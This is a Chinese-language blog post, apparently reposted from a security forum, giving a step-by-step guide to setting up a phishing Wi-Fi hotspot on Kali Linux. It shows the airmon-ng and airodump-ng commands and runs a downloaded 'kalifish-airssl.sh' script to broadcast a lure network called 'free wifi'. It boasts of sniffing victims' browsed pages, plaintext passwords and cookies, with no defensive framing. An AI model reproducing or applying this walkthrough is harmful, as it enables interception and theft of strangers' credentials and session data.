钓鱼wifi实践记录

admin 2021年8月9日20:01:53评论53 views字数 1330阅读4分26秒阅读模式

感谢吐司的管理.创造了这么好的一个学习环境.
好了废话不多说...大家看我的步骤吧,技术有限别笑我哦...
---
今天无聊没事情做,然后搞了搞钓鱼wifi。

现将过程记录下来共享给大家,希望大家喜欢。。

先上几张效果图。

钓鱼wifi实践记录

NO.1成功嗅探到被攻击手机浏览的图片信息。

钓鱼wifi实践记录

NO.2 成功嗅探到被攻击手机打开的网页、用户账号(明文密码)、cookie等信息。

要了言归正传,估计大家看到这里都挺开心的,觉得挺好玩。

下面咱们一起学习一下制作过程,让他不在神秘。


0x01
先安装1 isc-dhcp-server
命令行:
apt-get install isc-dhcp-server
这里不详细讲解。大家应该都懂得。

0x02
如果你是安装失败,那么把这个下载下来。点击下载

然后放到kali的这个目录下/etc/apt/
覆盖原来的source.list
然后执行:
apt-get update
apt-get upgrade
apt-get install isc-dhcp-server
配置/etc/default/isc-dhcp-server
右键-----属性------权限----允许以程序运行
右键---属性---权限---已程序运行的勾打上

0x03
之后咱们还需要一个文件。点击下载
这个脚本是我在网上随便下载的,如果大家有更好的.那么一定要无私的共享下哦..

解压后的文件,放在虚拟机中,位置自己决定.一般推荐放到桌面


终端:
cd Desktop
我们先把usb网卡加载进去(对使用虚拟机的说)

iwconfig 查看网卡
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off


这里显示已经找到外置无线网卡了。

接下来我们将网卡加载
airmon-ng start wlan0 1

钓鱼wifi实践记录

这里我们需要注意的是PID
我PID是:2976 3128 6010

0x04

然后在终端中按顺序输入:
kill 2976 3128 6010
然后:
airodump-ng wlan0

钓鱼wifi实践记录

出现这些闪的东西后 表示咱们前期工作已经做完了
Ctrl+C
中断操作


0x05

这里我们以脚本放在了桌面为例
如图:
cd Desktop 进入到桌面

bash kalifish-airssl.sh
执行以后会要求你输入IP地址。

我在下面的图片中已经标记出来了。
执行后,如下图所示:

钓鱼wifi实践记录

钓鱼wifi实践记录

这里要求输入IP地址的时候一定要输入扫描出来的IP地址,不要输入:For example 后面的IP

0x06

接下来,会弹出很多黑色小窗口...千万不要关闭!!!
这时...可以用手机等无线设备搜索名为” 免费wifi-请叫我雷锋”的wifi
这个就是搭建出来的钓鱼wifi了.

自己可以尝试登录网页,查看图片信息。

终端上都会显示出来被攻击者的浏览登录信息。
退出:回到终端中直接回车…就ok

0x07

你下载的那个.sh的文件,用leafpad打开,适当的自己修改一下BSSID什么的..多少有点注释..可以自己尝试修改。


本文始发于微信公众号(T00ls):钓鱼wifi实践记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月9日20:01:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   钓鱼wifi实践记录https://cn-sec.com/archives/352619.html

发表评论

匿名网友 填写信息